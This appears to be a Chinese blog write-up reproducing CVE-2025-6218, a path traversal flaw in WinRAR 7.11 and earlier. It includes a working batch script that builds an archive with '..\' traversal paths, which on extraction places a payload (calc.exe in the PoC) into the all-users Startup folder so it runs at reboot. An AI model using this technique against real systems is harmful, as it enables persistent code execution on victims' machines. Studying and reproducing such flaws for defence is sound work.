简介
总所周知,WinRAR是一款老牌的解压缩软件,知名产品同时也是许多装机必备的软件。近期发现了一个严重安全漏洞,CVE-2025-6218(路径穿越漏洞),攻击者可通过构造恶意的压缩文件,实现在压缩文件解压时可以将文件释放到受害者系统的敏感路径下(例如自启动目录),进而实现远程代码执行或者持久化控制。
攻击需要目标用户访问恶意网页或打开恶意压缩文件,因此容易受到社会工程攻击。
影响&&利用条件
WinRAR 7.11版本及更早版本(2025年6月19日补丁发布前的所有版本)
需要WinRAR 安装在默认位置:C:\Program Files\WinRAR\WinRAR.exe(或已知WinRAR的安装目录)
需要目标用户访问恶意网页或解压缩恶意压缩文件
漏洞利用
思考:利用路径穿越,我们是否可以将一些恶意的脚本文件写入到windows的自启动项中,一般系统的自启动项目录在 C:\Users\[用户名]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
由于 Windows 路径回退(..\)不会跨盘符,因此需要用户设置解压路径在C盘,那么我们就有机会将文件最终落地位置改到自启动目录中。
回看自启动目录的绝对路径,二级目录是用户自定义的用户名,我们无法通过外界手段获取具体的用户名,并且用户解压时我们也无法控制其在执行解压命令时的具体位置,所以回退符少了或者多了会导致我们最终拼接的路径并不正确,因此在拼接具体的解压位置时这里选择 把目标路径选在系统盘的固定公共位置
比如:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup(公共启动文件夹,对所有用户生效)。- 或
C:\Users\Public\Documents(有写权限的公共文件夹)。
这样只要回退到 C:\,拼接公共路径即可,兼容大部分用户在 C:\Users\XXX\Desktop、C:\Users\XXX\Downloads 等常用目录解压的情况。再结合回退符(..\)不会跨盘符的特性,我们只要拼接足够的回退符就可以提高我们的成功率。
制造恶意zip
Make.bat
@echo off
title CVE-2025-6218 POC
"D:\RAR\WinRAR.exe" a -ap "\..\..\..\..\..\..\..\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" %~dp0learnsource.zip POC.bat
echo.
if errorlevel 1 (
echo [!] Failed to create POC.
) else (
echo [+] CVE-2025-6218.zip created successfully!
)
echo.
del POC.bat
pause
//"D:\RAR\WinRAR.exe" 代表本机上WinRAR软件的路径
//a 代表添加文件到压缩包
//-ap 设置压缩包内的相对路径(就在这里尝试路径穿越)
//%~dp0 代表当前脚本所在的路径POC.bat
calc.exe其中%~dp0LearnSource.zip代表生成的zip文件在当前目录下,且命名为LearnSource。因环境不同,可能执行改脚本时会出现
,这意味着 WinRAR 可能把相对路径理解成了相对它自己执行位置的路径,而不是批处理脚本的位置,需要将脚本放在WinRAR执行文件的目录下,或者可以将该生成路径改为绝对路径
其中POC.bat为需要打包的恶意文件,放在和脚本的同级目录即可
Test
运行生成脚本
放入靶机进行解压缩
解压后文件落地
重启后启动项自动执行
近期WinRAR部分版本已经加上补丁,新增沙盒机制,对于一些敏感目录会强制解压缩到当前录取,复现也许会不成功,考虑跟老版本尝试复现
参考:
扫一扫
580
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
